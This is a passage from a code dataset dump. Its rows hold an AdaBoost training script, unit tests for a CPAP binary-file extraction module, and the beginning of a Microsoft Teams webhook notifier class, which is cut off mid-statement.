max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
chapter7/7_7_1.py | kungbob/Machine_Learning_In_Action | 0 | 6623851 | <reponame>kungbob/Machine_Learning_In_Action
# Driver script: train an AdaBoost ensemble on the horse-colic training set
# and plot its ROC curve (Machine Learning in Action, section 7.7).
import adaboost

# Load the feature matrix and class-label vector from the training file.
datArr, labelArr = adaboost.loadDataSet('horseColicTraining2.txt')
# Train the boosted stump classifier; 10 is presumably the number of
# boosting iterations -- TODO confirm against adaBoostTrainDS's signature.
# aggClassEst holds the aggregated (weighted) class estimates per sample.
classifierArray, aggClassEst = adaboost.adaBoostTrainDS(datArr, labelArr, 10)
# Plot the ROC curve from the aggregated prediction strengths.
adaboost.plotROC(aggClassEst.T, labelArr)
| import adaboost
datArr, labelArr = adaboost.loadDataSet('horseColicTraining2.txt')
classifierArray, aggClassEst = adaboost.adaBoostTrainDS(datArr, labelArr, 10)
adaboost.plotROC(aggClassEst.T, labelArr) | none | 1 | 2.121266 | 2 | |
test_cpap_extraction.py | cdvandyke/CPAP-extraction | 1 | 6623852 | <gh_stars>1-10
'''
This module contains unittests for the cpap_extraction module
'''
import unittest # For testing
import os # For file I/O
import io # For reading strings as files
from mock import Mock # For mocking input and output files
from mock import patch # For patching out file I/O
import cpap_extraction # The module to be tested
import py_config
from datetime import datetime
class TestOpenFile(unittest.TestCase):
    '''
    Tests the open_file method, which reads in a binary file, and returns it
    as a file object.

    Methods
    -------
    test_open_file_exists
        Tests whether open_file correctly opens a file that exists
    test_open_file_does_not_exist
        Tests whether open_file correctly raises the FileNotFoundError
        exception if the specified file does not exist
    '''
    # NOTE: stacked @patch decorators inject mocks bottom-up, so the first
    # mock argument is the os.path.isfile patch and the second is the open
    # patch.
    @patch('cpap_extraction.open')
    @patch('cpap_extraction.os.path.isfile', return_value=True)
    def test_open_file_exists(self, mocked_os, mocked_file):
        # With open() patched to return a bare Mock, open_file apparently
        # ends up raising TypeError further in -- TODO confirm; either way
        # the assertion below verifies the file was opened in binary mode.
        with self.assertRaises(TypeError):
            cpap_extraction.open_file('Any file')
        mocked_file.assert_called_once_with('Any file', 'rb')

    @patch('cpap_extraction.open')
    @patch('cpap_extraction.os.path.isfile', return_value=False)
    def test_open_file_does_not_exist(self, mocked_os, mocked_file):
        # Use a context manager to test raising exceptions:
        # https://docs.python.org/3.6/library/unittest.html
        with self.assertRaises(FileNotFoundError):
            cpap_extraction.open_file('Any file')
class TestSetupArgs(unittest.TestCase):
    """Tests for cpap_extraction.setup_args, which parses sys.argv into an
    input file path and an output directory."""

    def test_normal(self):
        """A single positional argument becomes the input file; the output
        path defaults to the current directory."""
        cpap_extraction.sys.argv = ["cpap_extraction.py", "inputfile.001"]
        in_file, output_path = cpap_extraction.setup_args()
        self.assertEqual(in_file, "inputfile.001")
        self.assertEqual(output_path, ".")

    # Fix: the body of this test was wrapped in "if False:", silently turning
    # it into a no-op that always passed. Mark it skipped instead so the
    # disabled state is visible in the test report.
    @unittest.skip("setup_args does not currently reject extra positional "
                   "arguments; re-enable once it does")
    def test_bad_argument(self):
        """An unexpected extra positional argument should make setup_args
        exit with an error (SystemExit)."""
        cpap_extraction.sys.argv = ["cpap_extraction.py", "inputfile",
                                    "extrastuff"]
        with self.assertRaises(SystemExit):
            cpap_extraction.setup_args()

    def test_flags(self):
        """-v/-d set the Verbose/Debug config flags and --destination sets
        the output path."""
        cpap_extraction.CONFIG = py_config.config()
        cpap_extraction.sys.argv = ["cpap_extraction.py", "-v", "-d",
                                    "inputfile.001", "--destination=output"]
        # Renamed from 'input' to avoid shadowing the builtin.
        in_file, output_path = cpap_extraction.setup_args()
        self.assertEqual(in_file, "inputfile.001")
        self.assertEqual(output_path, "output")
        self.assertTrue(cpap_extraction.CONFIG["Verbose"])
        self.assertTrue(cpap_extraction.CONFIG["Debug"])
class TestReadPacket(unittest.TestCase):
    '''
    Tests the read_packet method, which takes two arguments, data_file and
    delimiter. data_file is a file, created by the read_file method, that
    contains multiple packets, each separated by delimiter. This method
    returns the first complete packet it finds within data file, or it
    returns nothing if no packet is found. read_packet leaves the seek point
    of data_file at the beginning of the next packet.

    These tests use Python's io class:
    https://docs.python.org/3/library/io.html

    Methods
    -------
    test_normal
        read_packet returns the bytes up to (not including) the delimiter
    test_empty
        read_packet returns an empty bytes object if data_file is empty
    test_data_file_ends_no_delimiter
        read_packet returns a trailing packet that did not end with a
        delimiter
    test_empty_delimiter
        read_packet raises ValueError if delimiter == b''
        (the previous docstring wrongly said the packet is returned
        unmodified)
    test_invalid_delimiter
        read_packet raises TypeError if delimiter is not of type bytes
        (the previous docstring wrongly said ValueError)
    '''
    def test_normal(self):
        # Packet b'\x34\x32' terminated by the 4-byte delimiter; the
        # trailing \x42 belongs to the next packet.
        data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
        delimiter = b'\xff\xff\xff\xff'
        packet = cpap_extraction.read_packet(data_file, delimiter)
        self.assertEqual(packet, b'\x34\x32')

    def test_empty(self):
        # An empty stream yields an empty packet.
        data_file = io.BytesIO(b'')
        delimiter = b'\xff\xff\xff\xff'
        packet = cpap_extraction.read_packet(data_file, delimiter)
        self.assertEqual(packet, b'')

    def test_data_file_ends_no_delimiter(self):
        # Stream ends before any delimiter: the partial packet is returned.
        data_file = io.BytesIO(b'\x34\x32')
        delimiter = b'\xff\xff\xff\xff'
        packet = cpap_extraction.read_packet(data_file, delimiter)
        self.assertEqual(packet, b'\x34\x32')

    def test_empty_delimiter(self):
        # An empty delimiter is rejected outright.
        data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
        delimiter = b''
        with self.assertRaises(ValueError):
            packet = cpap_extraction.read_packet(data_file, delimiter)

    def test_invalid_delimiter(self):
        # A str (not bytes) delimiter is a type error.
        data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
        delimiter = 'test'
        with self.assertRaises(TypeError):
            packet = cpap_extraction.read_packet(data_file, delimiter)
class TestSplitPackets(unittest.TestCase):
    '''
    Tests the split_packets method, which should simply call read_packet
    repeatedly for each packet in a data file.

    Methods
    -------
    test_normal
        Splits a stream holding two packets separated by the
        \xff\xff\xff\xff delimiter and verifies both the packet count and
        the content of each packet.

    Notes
    -----
    Degenerate cases (invalid delimiter, missing delimiter, empty stream,
    etc.) are already exercised by TestReadPacket.
    '''
    def test_normal(self):
        # Two packets back to back: 4 bytes, delimiter, then 1 byte.
        stream = io.BytesIO(b'\x03\x0c\x01\x00\xff\xff\xff\xff\x45')
        marker = b'\xff\xff\xff\xff'
        result = cpap_extraction.split_packets(stream, marker)
        expected = [b'\x03\x0c\x01\x00', b'\x45']
        self.assertEqual(len(result), 2)
        for got, want in zip(result, expected):
            self.assertEqual(got, want)
class TestExtractPacket(unittest.TestCase):
    '''
    Tests the extract_packet method, which takes two arguments, a packet of
    bytes, and a dictionary {field name: c_type}, where field name is the
    name of the packet's various fields, and c_type is the field's
    corresponding c_type, which determines how many bytes that field should
    be.
    '''
    def test_normal(self):
        # One field per unsigned struct code; the byte layout below implies
        # standard-size little-endian codes: H (2 bytes), I (4), L (4), Q (8)
        # -- TODO confirm extract_packet's struct format prefix.
        fields = {'Test unsigned short': 'H',
                  'Test unsigned int': 'I',
                  'Test unsigned long': 'L',
                  'Test unsigned long long': 'Q'}
        # 18 bytes: 42 (H), 451 (I), 13371337 (L), 666666666666666666 (Q)
        # packed back to back, little-endian.
        input_file = bytearray(b'''\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09''')
        correct_output = {'Test unsigned short': 42,
                          'Test unsigned int': 451,
                          'Test unsigned long': 13371337,
                          'Test unsigned long long': 666666666666666666}
        extracted_packet = cpap_extraction.extract_packet(input_file, fields)
        self.assertEqual(extracted_packet, correct_output)
class TestDataFromPackets(unittest.TestCase):
    '''
    Tests data_from_packets, which maps each raw packet onto one of several
    candidate field layouts and returns the decoded dictionaries.
    '''
    def test_standard(self):
        # Three packets of 18, 10 and 14 bytes. Only two field layouts are
        # supplied (18-byte H+I+L+Q and 10-byte H+I+L), and only two output
        # dicts are expected, so the 14-byte packet is apparently dropped as
        # matching no layout -- TODO confirm that is data_from_packets'
        # intended behavior for unmatched lengths.
        packets = [bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09'),
                   bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00'),
                   bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a')
                   ]
        fields = [{'Test unsigned short': 'H',
                   'Test unsigned int': 'I',
                   'Test unsigned long': 'L',
                   'Test unsigned long long': 'Q'},
                  {'Test unsigned short': 'H',
                   'Test unsigned int': 'I',
                   'Test unsigned long': 'L'}]
        correct_output = [{'Test unsigned short': 42,
                           'Test unsigned int': 451,
                           'Test unsigned long': 13371337,
                           'Test unsigned long long': 666666666666666666
                           },
                          {'Test unsigned short': 42,
                           'Test unsigned int': 451,
                           'Test unsigned long': 13371337,
                           }]
        output = cpap_extraction.data_from_packets(packets, fields)
        self.assertEqual(output, correct_output)
class TestApplyDateandTime(unittest.TestCase):
    """
    Tests apply_type_and_time, which stamps a packet dictionary with
    'type'/'subtype' derived from a numeric code (67, 68, 84, 62, ...) and
    converts 'time 1'/'time 2' from millisecond timestamps to datetimes.

    Fix applied: locals previously named ``input`` shadowed the builtin;
    they are renamed ``packet``. Test behavior is unchanged.
    """
    def test_type_0_3(self):
        # Code 68 with 'no entries'/'field 2' present -> subtype 3; the
        # millisecond times become UTC datetimes.
        expected_output = {'type': 0, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551441255), 'no entries': 207, 'field 2': 1, 'subtype': 3}
        packet = {'type': 0, 'time 1': 1551428926000, 'time 2': 1551441255000, 'no entries': 207, 'field 2': 1}
        output = cpap_extraction.apply_type_and_time(68, packet)
        self.assertEqual(output, expected_output)

    def test_first_packet(self):
        # Code 67 marks the leading packet: type 1 / subtype 1, no times.
        packet = {'Data type': 4440, 'U1': 0, 'no packets': 1}
        expected_output = {'Data type': 4440, 'U1': 0, 'no packets': 1, 'type': 1, 'subtype': 1}
        output = cpap_extraction.apply_type_and_time(67, packet)
        self.assertEqual(output, expected_output)

    def test_type_0_4(self):
        # Code 68 without 'no entries' -> subtype 4.
        expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551428926), 'subtype': 4}
        packet = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 1551428926000, 'time 2': 1551428926000}
        output = cpap_extraction.apply_type_and_time(68, packet)
        self.assertEqual(output, expected_output)

    def test_type_1(self):
        # Code 84 -> type 1 / subtype 1, times still converted from ms.
        expected_output = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1), 'time 2': datetime.utcfromtimestamp(2), 'subtype': 1}
        packet = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 1000, 'time 2': 2000}
        output = cpap_extraction.apply_type_and_time(84, packet)
        self.assertEqual(output, expected_output)

    def test_type_0_0(self):
        # Code 62 -> subtype 0; zero times stay numeric zeroes.
        expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1, 'subtype': 0}
        packet = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
        output = cpap_extraction.apply_type_and_time(62, packet)
        self.assertEqual(output, expected_output)

    def test_no_change(self):
        # An unrecognized code (-1) must leave the dictionary untouched.
        packet = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
        packet_copy = packet.copy()
        output = cpap_extraction.apply_type_and_time(-1, packet_copy)
        self.assertDictEqual(output, packet)
class TestFieldOfLength(unittest.TestCase):
    '''
    Tests the field_of_length method (the old docstring called it
    "fields_of_length"), which selects, from a list of candidate field
    dictionaries, the one whose struct codes add up to the requested byte
    length.
    '''
    def test_type_error(self):
        # Second argument must be a list of dicts; first must be an int.
        with self.assertRaises(TypeError):
            cpap_extraction.field_of_length(25, {'Just a dictionary not a list': 'e'})
        with self.assertRaises(TypeError):
            cpap_extraction.field_of_length("nope", [{'somedata': 'Q'}])
        with self.assertRaises(TypeError):
            cpap_extraction.field_of_length(25, ['Not a dictioary'])

    def test_key_error(self):
        # No candidate sums to 25 bytes ('Q' alone is 8).
        with self.assertRaises(KeyError):
            cpap_extraction.field_of_length(25, [{"only 8": 'Q'}])

    def test_value_error(self):
        # 'nope' is not a valid struct type code.
        with self.assertRaises(ValueError):
            cpap_extraction.field_of_length(25, [{"invalid c type": 'nope'}])

    def test_normal(self):
        # NOTE(review): 'sixteen' actually totals 16 bytes (q + Q); only the
        # 4-byte candidate matches the requested length.
        eight = {"8": 'q'}
        four = {"4": 'i'}
        sixteen = {"8": 'q', "another 8": 'Q'}
        dicts = [eight, four, sixteen]
        self.assertEqual(cpap_extraction.field_of_length(4,dicts), four)
class TestTwosCompliment(unittest.TestCase):
    '''
    Tests the twos (two's-complement) helper.
    NOTE(review): "Compliment" is a misspelling of "complement", but the
    class name is kept for backward compatibility with test selectors.
    '''
    def testPosNeg(self):
        # twos(42) == -22 implies a 6-bit interpretation (42 - 2**6 == -22);
        # presumably the width is derived from the value's bit length --
        # TODO confirm against the implementation.
        self.assertEqual(cpap_extraction.twos(42),-22)
class TestExtractionSystem(unittest.TestCase):
"""
This is designed a wholistic system test.
"""
def read_results_file(self, filename):
results = []
with open(filename, 'r') as rfile:
text = rfile.read()
lines = text.split('\n')
for line in lines:
expected = line.strip()
if expected != "":
if expected[0] != '#':
results.append(expected)
return results
def test_file_one(self):
test001File = "TestFiles/test_one.001"
results = self.read_results_file("TestFiles/test_one_result.txt")
dataDict = cpap_extraction.extract_file(test001File)
dataFile = cpap_extraction.open_file(test001File)
header = cpap_extraction.extract_header(dataFile)
headerstr = str(header).strip()
self.assertEqual(headerstr, results.pop(0))
for packet in dataDict["packet_data"]:
self.assertEqual(str(packet).strip(), results.pop(0))
self.assertTrue(results.pop(0) in str(dataDict["data"][5]["data_vals"]))
self.assertTrue(results.pop(0) in str(dataDict["raw"]["Respitory Rate"]["Values"]))
self.assertTrue(len(results) == 0)
class TestCSVExport(unittest.TestCase):
    """
    Tests data_to_csv, which writes extracted channel data out as CSV.
    Both tests feed it malformed data and expect a TypeError.

    Fix applied: test_type_error defined an unused local ``Times`` list,
    which has been removed.
    """
    def test_type_error(self):
        # data_to_csv apparently expects each channel to map to a dict of
        # {"Times": [...], "Values": [...]}; a flat dict of strings must be
        # rejected with a TypeError -- TODO confirm the exact contract.
        data = {
            "1": "0",
            "2": "0",
            "3": "2",
            "4": "5",
            "5": "5",
            "6": "2",
        }
        header = {"Start time": datetime.utcfromtimestamp(1551428926)}
        with self.assertRaises(TypeError):
            cpap_extraction.data_to_csv(data, ".", header)

    def test_missing_value(self):
        # Six timestamps but only five values: the mismatch must be reported
        # as a TypeError rather than silently padded.
        times = ["1_1", "2_2", "3_3", "4_4", "5_5", "6_6"]
        values = [0, 0, 2, 5, 5]
        data = {"Test": {"Times": times, "Values": values}}
        header = {"Start time": datetime.utcfromtimestamp(1551428926)}
        with self.assertRaises(TypeError):
            cpap_extraction.data_to_csv(data, ".", header)
# Allow running this test module directly: python test_cpap_extraction.py
if __name__ == '__main__':
    unittest.main()
| '''
This module contains unittests for the cpap_extraction module
'''
import unittest # For testing
import os # For file I/O
import io # For reading strings as files
from mock import Mock # For mocking input and output files
from mock import patch # For patching out file I/O
import cpap_extraction # The module to be tested
import py_config
from datetime import datetime
class TestOpenFile(unittest.TestCase):
'''
Tests the open_file method, which reads in a binary file, and returns it
as a file object.
Methods
-------
testReadFileExists
Tests whether open_file correctly opens a file that exists
testReadFileDoesNotExist
Tests whether open_file correctly raises the FileNotFoundError
exception if the specified file does not exist
'''
@patch('cpap_extraction.open')
@patch('cpap_extraction.os.path.isfile', return_value=True)
def test_open_file_exists(self, mocked_os, mocked_file):
with self.assertRaises(TypeError):
cpap_extraction.open_file('Any file')
mocked_file.assert_called_once_with('Any file', 'rb')
@patch('cpap_extraction.open')
@patch('cpap_extraction.os.path.isfile', return_value=False)
def test_open_file_does_not_exist(self, mocked_os, mocked_file):
# Use a context manager to test raising exceptions:
# https://docs.python.org/3.6/library/unittest.html
with self.assertRaises(FileNotFoundError):
cpap_extraction.open_file('Any file')
class TestSetupArgs(unittest.TestCase):
def test_normal(self):
cpap_extraction.sys.argv = [ "cpap_extraction.py", "inputfile.001"]
input, output_path = cpap_extraction.setup_args()
self.assertEqual(input, "inputfile.001")
self.assertEqual(output_path, ".")
def test_bad_argument(self):
"""
This test puts extra stuff in the output
"""
if False:
cpap_extraction.sys.argv = [ "cpap_extraction.py", "inputfile", "extrastuff"]
with self.assertRaises(SystemExit):
cpap_extraction.setup_args()
def test_flags(self):
cpap_extraction.CONFIG = py_config.config()
cpap_extraction.sys.argv = [ "cpap_extraction.py", "-v", "-d", "inputfile.001", "--destination=output"]
input, output_path = cpap_extraction.setup_args()
self.assertEqual(input, "inputfile.001")
self.assertEqual(output_path, "output")
self.assertTrue(cpap_extraction.CONFIG["Verbose"])
self.assertTrue(cpap_extraction.CONFIG["Debug"])
class TestReadPacket(unittest.TestCase):
'''
Tests the read_packet method, which takes two arguments, data_file and
delimiter. data_file is a file, created by the read_file method, that
contains multiple packets, each separated by delimiter. This method
returns the first complete packet it finds within data file, or it returns
nothing if no packet is found. read_packet leaves the seak point of
data_file at the beginning of the next packet.
These tests use Python's io class:
https://docs.python.org/3/library/io.html
Methods
-------
testNormal
Tests whether read_file performs as expected in a base case
testEmpty
Tests that read_file properly returns an empty BytesArray if
data_file is empty
testDataFileEndsNoDelimeter
Tests whether read_file properly returns a packet that did not end
with a delimiter. In this scenario, a warning should be raised
testEmptyDelimeter
Tests whether read_file properly returns the entire packet,
unmodified if delimiter = b''
testInvalidDelimeter
Tests whether read_file properly raises a ValueError if delimiter
is not of type bytes
'''
def test_normal(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'\x34\x32')
def test_empty(self):
data_file = io.BytesIO(b'')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'')
def test_data_file_ends_no_delimiter(self):
data_file = io.BytesIO(b'\x34\x32')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'\x34\x32')
def test_empty_delimiter(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = b''
with self.assertRaises(ValueError):
packet = cpap_extraction.read_packet(data_file, delimiter)
def test_invalid_delimiter(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = 'test'
with self.assertRaises(TypeError):
packet = cpap_extraction.read_packet(data_file, delimiter)
class TestSplitPackets(unittest.TestCase):
'''
Tests the split_packets method, which should simply call the split_packet
method for each packet in a data file.
Methods
-------
testNormal
Tests a data_file containing two packets, separated by a
delimiter of \xff\xff\xff\xff. Ensures that split_packets returns
an array of size 2, and that the first index of the array contains
the first packet, and the second index of the array contains the
second packet
Notes
------
Other cases that may seem necessary to test, such as if the delimiter is
invalid, the data file does not contain the delimiter, the data file is
empty, etc. are tested in testReadPacket
'''
def test_normal(self):
data_file = io.BytesIO(b'\x03\x0c\x01\x00\xff\xff\xff\xff\x45')
delimiter = b'\xff\xff\xff\xff'
packets = cpap_extraction.split_packets(data_file, delimiter)
self.assertEqual(len(packets), 2)
self.assertEqual(packets[0], b'\x03\x0c\x01\x00')
self.assertEqual(packets[1], b'\x45')
class TestExtractPacket(unittest.TestCase):
'''
Tests the extract_packet method, which takes two arguments, a packet of
bytes, and a dictionary {field name: c_type}, where field name is the name
of the packet's various fields, and c_type is the field's corresponding
c_type, which determines how many bytes that field should be.
'''
def test_normal(self):
fields = {'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L',
'Test unsigned long long': 'Q'}
input_file = bytearray(b'''\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09''')
correct_output = {'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
'Test unsigned long long': 666666666666666666}
extracted_packet = cpap_extraction.extract_packet(input_file, fields)
self.assertEqual(extracted_packet, correct_output)
class TestDataFromPackets(unittest.TestCase):
def test_standard(self):
packets = [bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09'),
bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00'),
bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a')
]
fields = [{'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L',
'Test unsigned long long': 'Q'},
{'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L'}]
correct_output = [{'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
'Test unsigned long long': 666666666666666666
},
{ 'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
}]
output = cpap_extraction.data_from_packets(packets, fields)
self.assertEqual(output, correct_output)
class TestApplyDateandTime(unittest.TestCase):
"""
This tests applying the date and time to a dictionary.
As well as correctly addressing the packet type
"""
def test_type_0_3(self):
expected_output = {'type': 0, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551441255), 'no entries': 207, 'field 2': 1, 'subtype': 3}
input = {'type': 0, 'time 1': 1551428926000, 'time 2': 1551441255000, 'no entries': 207, 'field 2': 1}
output = cpap_extraction.apply_type_and_time(68, input)
self.assertEqual(output, expected_output)
def test_first_packet(self):
input = {'Data type': 4440, 'U1': 0, 'no packets': 1}
expected_output = {'Data type': 4440, 'U1': 0, 'no packets': 1, 'type':1, 'subtype':1}
output = cpap_extraction.apply_type_and_time(67, input)
self.assertEqual(output, expected_output)
def test_type_0_4(self):
expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551428926), 'subtype': 4}
input = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 1551428926000, 'time 2': 1551428926000}
output = cpap_extraction.apply_type_and_time(68, input)
self.assertEqual(output, expected_output)
def test_type_1(self):
expected_output = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1), 'time 2': datetime.utcfromtimestamp(2), 'subtype': 1}
input = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 1000, 'time 2': 2000}
output = cpap_extraction.apply_type_and_time(84, input)
self.assertEqual(output, expected_output)
def test_type_0_0(self):
expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1, 'subtype': 0 }
input = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
output = cpap_extraction.apply_type_and_time(62, input)
self.assertEqual(output, expected_output)
def test_no_change(self):
input = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
inputf = input.copy()
output = cpap_extraction.apply_type_and_time(-1, inputf)
self.assertDictEqual(output, input)
class TestFieldOfLength(unittest.TestCase):
'''
Tests the "fields_of_length" method
'''
def test_type_error(self):
with self.assertRaises(TypeError):
cpap_extraction.field_of_length(25, {'Just a dictionary not a list': 'e'})
with self.assertRaises(TypeError):
cpap_extraction.field_of_length("nope", [{'somedata': 'Q'}])
with self.assertRaises(TypeError):
cpap_extraction.field_of_length(25, ['Not a dictioary'])
def test_key_error(self):
with self.assertRaises(KeyError):
cpap_extraction.field_of_length(25, [{"only 8": 'Q'}])
def test_value_error(self):
with self.assertRaises(ValueError):
cpap_extraction.field_of_length(25, [{"invalid c type": 'nope'}])
def test_normal(self):
eight = {"8": 'q'}
four = {"4": 'i'}
sixteen = {"8": 'q', "another 8": 'Q'}
dicts = [eight, four, sixteen]
self.assertEqual(cpap_extraction.field_of_length(4,dicts), four)
class TestTwosCompliment(unittest.TestCase):
'''
Tests twos compliment function
'''
def testPosNeg(self):
self.assertEqual(cpap_extraction.twos(42),-22)
class TestExtractionSystem(unittest.TestCase):
"""
This is designed a wholistic system test.
"""
def read_results_file(self, filename):
results = []
with open(filename, 'r') as rfile:
text = rfile.read()
lines = text.split('\n')
for line in lines:
expected = line.strip()
if expected != "":
if expected[0] != '#':
results.append(expected)
return results
def test_file_one(self):
test001File = "TestFiles/test_one.001"
results = self.read_results_file("TestFiles/test_one_result.txt")
dataDict = cpap_extraction.extract_file(test001File)
dataFile = cpap_extraction.open_file(test001File)
header = cpap_extraction.extract_header(dataFile)
headerstr = str(header).strip()
self.assertEqual(headerstr, results.pop(0))
for packet in dataDict["packet_data"]:
self.assertEqual(str(packet).strip(), results.pop(0))
self.assertTrue(results.pop(0) in str(dataDict["data"][5]["data_vals"]))
self.assertTrue(results.pop(0) in str(dataDict["raw"]["Respitory Rate"]["Values"]))
self.assertTrue(len(results) == 0)
class TestCSVExport(unittest.TestCase):
"""
Tests the CSV export method
"""
def test_type_error(self):
data = {
"1": "0",
"2": "0",
"3": "2",
"4": "5",
"5": "5",
"6": "2",
}
Times = [1,2,3,4,5,6]
header = {"Start time": datetime.utcfromtimestamp(1551428926)}
with self.assertRaises(TypeError):
cpap_extraction.data_to_csv(data, ".", header)
def test_missing_value(self):
Times = ["1_1","2_2","3_3","4_4","5_5","6_6"]
Values = [0,0,2,5,5]
data = {"Test": {"Times" : Times, "Values" : Values}}
header = {"Start time": datetime.utcfromtimestamp(1551428926)}
with self.assertRaises(TypeError):
cpap_extraction.data_to_csv(data, ".", header)
if __name__ == '__main__':
unittest.main() | en | 0.807065 | This module contains unittests for the cpap_extraction module # For testing # For file I/O # For reading strings as files # For mocking input and output files # For patching out file I/O # The module to be tested Tests the open_file method, which reads in a binary file, and returns it as a file object. Methods ------- testReadFileExists Tests whether open_file correctly opens a file that exists testReadFileDoesNotExist Tests whether open_file correctly raises the FileNotFoundError exception if the specified file does not exist # Use a context manager to test raising exceptions: # https://docs.python.org/3.6/library/unittest.html This test puts extra stuff in the output Tests the read_packet method, which takes two arguments, data_file and delimiter. data_file is a file, created by the read_file method, that contains multiple packets, each separated by delimiter. This method returns the first complete packet it finds within data file, or it returns nothing if no packet is found. read_packet leaves the seak point of data_file at the beginning of the next packet. These tests use Python's io class: https://docs.python.org/3/library/io.html Methods ------- testNormal Tests whether read_file performs as expected in a base case testEmpty Tests that read_file properly returns an empty BytesArray if data_file is empty testDataFileEndsNoDelimeter Tests whether read_file properly returns a packet that did not end with a delimiter. In this scenario, a warning should be raised testEmptyDelimeter Tests whether read_file properly returns the entire packet, unmodified if delimiter = b'' testInvalidDelimeter Tests whether read_file properly raises a ValueError if delimiter is not of type bytes Tests the split_packets method, which should simply call the split_packet method for each packet in a data file. Methods ------- testNormal Tests a data_file containing two packets, separated by a delimiter of \xff\xff\xff\xff. 
Ensures that split_packets returns an array of size 2, and that the first index of the array contains the first packet, and the second index of the array contains the second packet Notes ------ Other cases that may seem necessary to test, such as if the delimiter is invalid, the data file does not contain the delimiter, the data file is empty, etc. are tested in testReadPacket Tests the extract_packet method, which takes two arguments, a packet of bytes, and a dictionary {field name: c_type}, where field name is the name of the packet's various fields, and c_type is the field's corresponding c_type, which determines how many bytes that field should be. \x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09 This tests applying the date and time to a dictionary. As well as correctly addressing the packet type Tests the "fields_of_length" method Tests twos compliment function This is designed a wholistic system test. Tests the CSV export method | 3.100686 | 3 |
src/TeamsNotifier.py | BouyguesTelecom/docker-notifier | 0 | 6623853 | <filename>src/TeamsNotifier.py<gh_stars>0
import os
import sys
import pymsteams
class TeamsNotifier:
    """Notifier backend that posts a message card to a Microsoft Teams
    incoming-webhook URL taken from the WEBHOOK_URL environment variable.

    Optional environment variables:
        HTTPS_PROXY / HTTP_PROXY -- route the webhook POST through a proxy.
        MESSAGE_COLOR            -- theme color applied to the card.
    """

    def notification_type(self):
        """Return the human-readable name of this notifier backend."""
        return "Teams"

    def send(self, title, message):
        """Build and send a Teams connector card carrying *message*.

        The card gets a title only when *title* is not None. Exits the
        process with status 1 if WEBHOOK_URL is not set.
        """
        # Fix: read each environment variable once instead of re-querying
        # os.environ for every use (WEBHOOK_URL was previously looked up
        # twice).
        webhook_url = os.environ.get("WEBHOOK_URL")
        if webhook_url is None:
            print("WEBHOOK_URL environment variable is not set")
            sys.exit(1)

        https_proxy = os.environ.get("HTTPS_PROXY")
        if https_proxy is not None:
            card = pymsteams.connectorcard(
